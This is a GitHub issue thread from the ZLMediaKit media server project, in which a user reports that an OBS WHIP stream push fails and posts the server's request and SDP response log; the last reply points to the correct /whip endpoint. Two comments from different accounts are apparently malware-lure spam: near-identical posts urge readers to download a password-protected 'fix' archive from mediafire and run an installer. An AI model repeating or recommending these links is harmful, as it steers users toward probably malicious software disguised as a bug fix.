### ISSUE TITLE
[BUG] obs推流报错 

### ISSUE THREAD

**Issue by Noiled** [ZLMediaKit/ZLMediaKit#3846]
## 现象描述

 使用最新的master代码，本地运行，使用obs 30.2.3推流报错，obs日志显示
22:46:13.415: [obs-webrtc] [whip_output: 'simple_stream'] Connect failed: HTTP endpoint returned response code 200
22:46:13.415: [obs-webrtc] [whip_output: 'simple_stream'] PeerConnection state is now: Closed
 

## 如何复现?

  必现
 

## 相关日志或截图

2024-08-27 22:50:22.563 D [MediaServer] [84702-event poller 7] WebApi.cpp:266 http api debug |
# request:
POST /index/api/webrtc?app=live&stream=test&type=push
# header:
Accept : */*
Content-Length : 1090
Content-Type : application/sdp
Host : 127.0.0.1
User-Agent : Mozilla/5.0 (OBS-Studio/30.2.3; Mac OS X; en-GB)
# content:
v=0
o=rtc 2843572611 0 IN IP4 127.0.0.1
s=-
t=0 0
a=group:BUNDLE 0 1
a=group:LS 0 1
a=msid-semantic:WMS *
a=setup:actpass
a=ice-ufrag:WlUQ
a=ice-pwd:x0Uxq0LenACvJqQuiiNuT6
a=ice-options:ice2,trickle
a=fingerprint:sha-256 73:D6:99:A4:F5:70:C0:C3:0A:BF:12:E0:42:98:B8:0B:F0:B3:03:D7:7C:A0:D6:7A:26:22:16:36:D6:68:E3:B6
m=audio 9 UDP/TLS/RTP/SAVPF 111
c=IN IP4 0.0.0.0
a=mid:0
a=sendonly
a=ssrc:3584382398 cname:gjG89AGfyRkzxYIE
a=ssrc:3584382398 msid:t2mpxYb1YKsSWG6c t2mpxYb1YKsSWG6c-audio
a=msid:t2mpxYb1YKsSWG6c t2mpxYb1YKsSWG6c-audio
a=rtcp-mux
a=rtpmap:111 opus/48000/2
a=fmtp:111 minptime=10;maxaveragebitrate=96000;stereo=1;sprop-stereo=1;useinbandfec=1
m=video 9 UDP/TLS/RTP/SAVPF 96
c=IN IP4 0.0.0.0
a=mid:1
a=sendonly
a=ssrc:3584382399 cname:gjG89AGfyRkzxYIE
a=ssrc:3584382399 msid:t2mpxYb1YKsSWG6c t2mpxYb1YKsSWG6c-video
a=msid:t2mpxYb1YKsSWG6c t2mpxYb1YKsSWG6c-video
a=rtcp-mux
a=rtpmap:96 H264/90000
a=rtcp-fb:96 nack
a=rtcp-fb:96 nack pli
a=rtcp-fb:96 goog-remb
a=fmtp:96 profile-level-id=42e01f;packetization-mode=1;level-asymmetry-allowed=1

# response:
{
	"code" : 0,
	"id" : "AAABAR9AH0A=_2",
	"sdp" : "v=0\r\no=rtc 2843572611 0 IN IP4 0.0.1.1\r\ns=-\r\nt=0 0\r\na=group:BUNDLE 0 1\r\na=msid-semantic: WMS *\r\na=ice-lite\r\nm=audio 8000 UDP/TLS/RTP/SAVPF 111\r\nc=IN IP4 0.0.1.1\r\na=rtcp:8000 IN IP4 0.0.1.1\r\na=ice-ufrag:AAABAR9AH0A=_2\r\na=ice-pwd:HGdYGXkvz99YvgZNHAOnSe2D\r\na=fingerprint:sha-256 5D:43:0F:2C:BD:82:BB:C5:B4:77:42:D3:8C:2B:D5:1A:32:59:39:1D:78:7A:BB:88:E2:EF:2A:60:37:AD:6E:A3\r\na=setup:passive\r\na=mid:0\r\na=ice-lite\r\na=recvonly\r\na=rtcp-mux\r\na=rtpmap:111 opus/48000/2\r\na=fmtp:111 maxaveragebitrate=96000;minptime=10;sprop-stereo=1;stereo=1;useinbandfec=1\r\na=candidate:udpcandidate 1 udp 120 0.0.1.1 8000 typ host\r\na=candidate:tcpcandidate 1 tcp 115 0.0.1.1 8000 typ host tcptype passive\r\nm=video 8000 UDP/TLS/RTP/SAVPF 96\r\nc=IN IP4 0.0.1.1\r\na=rtcp:8000 IN IP4 0.0.1.1\r\na=ice-ufrag:AAABAR9AH0A=_2\r\na=ice-pwd:HGdYGXkvz99YvgZNHAOnSe2D\r\na=fingerprint:sha-256 5D:43:0F:2C:BD:82:BB:C5:B4:77:42:D3:8C:2B:D5:1A:32:59:39:1D:78:7A:BB:88:E2:EF:2A:60:37:AD:6E:A3\r\na=setup:passive\r\na=mid:1\r\na=ice-lite\r\na=recvonly\r\na=rtcp-mux\r\na=rtpmap:96 H264/90000\r\na=rtcp-fb:96 goog-remb\r\na=rtcp-fb:96 nack\r\na=rtcp-fb:96 nack pli\r\na=fmtp:96 level-asymmetry-allowed=1;packetization-mode=1;profile-level-id=42e01f\r\na=candidate:udpcandidate 1 udp 120 0.0.1.1 8000 typ host\r\na=candidate:tcpcandidate 1 tcp 115 0.0.1.1 8000 typ host tcptype passive\r\n",
	"type" : "answer"
}
 

<details>
<summary>展开查看详细日志</summary>
<pre>

```
#详细日志粘在这里!
```
</pre>
</details>

## 配置

<details>
<summary>展开查看详细配置</summary>
<pre>

```ini
#config.ini内容粘在这里!
```
</pre>
</details>

## 各种环境信息

* **代码提交记录/git commit hash**:
* **操作系统及版本**:
* **硬件信息**:
* **crash backtrace**:
```
#崩溃信息backtrace粘贴至此
```
* **其他需要补充的信息**:

**Comment by littleblack666333** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PioLing** [comment]
你用错了，这是网页版推流api 
obs是用 http://{ip:port}/index/api/whip?app=live&stream=test
